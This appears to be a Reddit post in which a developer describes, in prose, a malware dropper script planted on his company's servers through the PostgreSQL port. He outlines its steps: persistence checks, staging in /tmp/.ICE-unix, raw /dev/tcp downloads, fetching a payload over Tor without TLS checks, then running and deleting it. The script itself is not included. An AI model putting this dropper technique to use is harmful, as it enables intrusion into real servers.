Hi, i hope everything is doing great, im writing this, for people who are curious and want to know more about how we got a cyber attack.

Recently we got an attack to almost all of our servers, since im not in the network/security team i don't know much details about how they got in, the only thing i know is that they used port 5432 which is for the postgres database, somehow they got in and they executed a query command that creates file and implant a malware script (again i don't know too much how they did it) the surprise thing is that all our networks are local we are blocking everything with iptables except our company's ips.

anyways let go to the good stuff ...

a friend of mine in the network team sent me the script that got installed in one of the servers(i begged him for the script), its a shell based script.
since im a programmer ... i coulnd't stop myself from analyse it and see what it does.
and i found that this script is soo damn charming, i like how the script is made and how it thought about every single piece.

the script idk if its was manual or he used an Obfuscator tool (like we call it in our world, im a dev btw), everything was written in gibberish names, but i didn't really care tbh, the script was simple and direct, but smart, i knew that it is not made by AI or by someone who is good at programming because he made some structure/duplication mistakes, but it was genius how the script works !

the goal of the script was simply, is to download the true malware and execute it !
the way how he does it, is fascinating*(at least for me)*.

i will give an overview how the scripts works (for the people who's lazy to read the script otherwise i will provide the script but i will comment the whole content)

PS : please be careful i still don't know what the malware do, so don't execute it !

so the script start by :

• redirecting all the output to /dev/null to eliminate any outputs

• checking if the script is already running in /proc if no it will relaunch

• checks if the path /tmp/.ICE-unix exist otherwise it recreates it, apparently this is a known folder that exist in most of the linux servers, and why in /tmp/ i think because the system deletes it contents after a period of time

• reorder the PATH variable where he adds multiple paths like /usr/bin /usr/local/bin /tmp and the current path and also the /tmp/.ICE-unix (so that he can execute the script wherever the path is, i guess not sure really)

• loop through those list of paths that he added in the PATH variable and create a file called i and gives it execution permission. (didn't know why he did it, but maybe because he is making sure that those path are executable or something not sure)

• checks if the curl exist and working other wise he makes an alternative (he will need such tool to download the malware, and for the alternative, he is making a raw tcp connection using /dev/tcp/host/port to download the curl from his server)

• finally the fun part (downloading the malware) he tries 4 different method to download the malware (for the sake of to make the post shorter i will talk only about one method)

• he bypasses the server dns, tls checks, sender fingerprint, ANND he connected to a tor server via sock5 proxy all in 1 command ... (scary and fascinating)

• finally he execute the script and removes it !

my curiosity pushed me a bit further and i have updated the script a bit so i can download the malware without executing it and see what is it about.

I extracted the url and i download malware hoping its a shell script too or something similar, i made sure that i removed the execution permission from it*(i was so scared to mess something up because again i know nothing about this, i only know how to program ... stuff ).*

the moment of truth has come, i tried to read to see its content. anddd .... fuck ! binary code .., the bastard compiled the code, i mean yea expectable, and that when i thought about emm why didn't he also complies the script that download the malware too, why only the malware !,

I tried to use some online decomplier but no chance i only get some gibberish contents, all this happens yesterday and im writing this, the day after the incident.
anyway, this is my story and here is the script and please this is only for education purposes and to seek for any information from you guys, i have so many questions actually, please correct anything i said ....
THE SCRIPT !:

i can't put the scipt here (cuz of Reddit's filters but yeah dm for the script)